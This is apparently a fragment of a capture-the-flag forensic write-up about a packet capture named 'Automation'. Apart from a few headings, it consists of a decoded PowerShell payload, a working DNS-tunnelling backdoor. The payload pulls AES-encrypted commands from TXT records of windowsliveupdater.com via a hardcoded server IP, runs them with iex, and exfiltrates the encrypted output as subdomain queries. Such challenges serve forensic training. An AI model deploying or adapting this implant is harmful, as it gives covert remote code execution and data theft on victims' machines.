Automation(forensic challenge)

pcap file

first useful item

Untitled

decoded payload

function Create-AesManagedObject($key, $IV) { $aesManaged = New-Object "System.Security.Cryptography.AesManaged" $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 if ($IV) { if ($IV.getType().Name -eq "String") { $aesManaged.IV = [System.Convert]::FromBase64String($IV)

    }
    else {
        $aesManaged.IV = $IV

    }
}
if ($key) {

    if ($key.getType().Name -eq "String") {
        $aesManaged.Key = [System.Convert]::FromBase64String($key)
    }
    else {
        $aesManaged.Key = $key
    }
}
$aesManaged

}

function Create-AesKey() {

$aesManaged = Create-AesManagedObject $key $IV
[System.Convert]::ToBase64String($aesManaged.Key)

}

function Encrypt-String($key, $unencryptedString) { $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) $aesManaged = Create-AesManagedObject $key $encryptor = $aesManaged.CreateEncryptor() $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); [byte[]] $fullData = $aesManaged.IV + $encryptedData $aesManaged.Dispose() [System.BitConverter]::ToString($fullData).replace("-","") }

function Decrypt-String($key, $encryptedStringWithIV) { $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) $IV = $bytes[0..15] $aesManaged = Create-AesManagedObject $key $IV $decryptor = $aesManaged.CreateDecryptor(); $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); $aesManaged.Dispose() [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) }

filter parts($query) { $t = $; 0..[math]::floor($t.length / $query) | % { $t.substring($query * $, [math]::min($query, $t.length - $query * $_)) }} $key = "a1E4MUtycWswTmtrMHdqdg==" $out = Resolve-DnsName -type TXT -DnsOnly windowsliveupdater.com -Server 147.182.172.189|Select-Object -Property Strings; for ($num = 0 ; $num -le $out.Length-2; $num++){ $encryptedString = $out[$num].Strings[0] $backToPlainText = Decrypt-String $key $encryptedString $output = iex $backToPlainText;$pr = Encrypt-String $key $output|parts 32 Resolve-DnsName -type A -DnsOnly start.windowsliveupdater.com -Server 147.182.172.189 for ($ans = 0; $ans -lt $pr.length-1; $ans++){ $domain = -join($pr[$ans],".windowsliveupdater.com") Resolve-DnsName -type A -DnsOnly $domain -Server 147.182.172.189 } Resolve-DnsName -type A -DnsOnly end.windowsliveupdater.com -Server 147.182.172.189 }

Untitled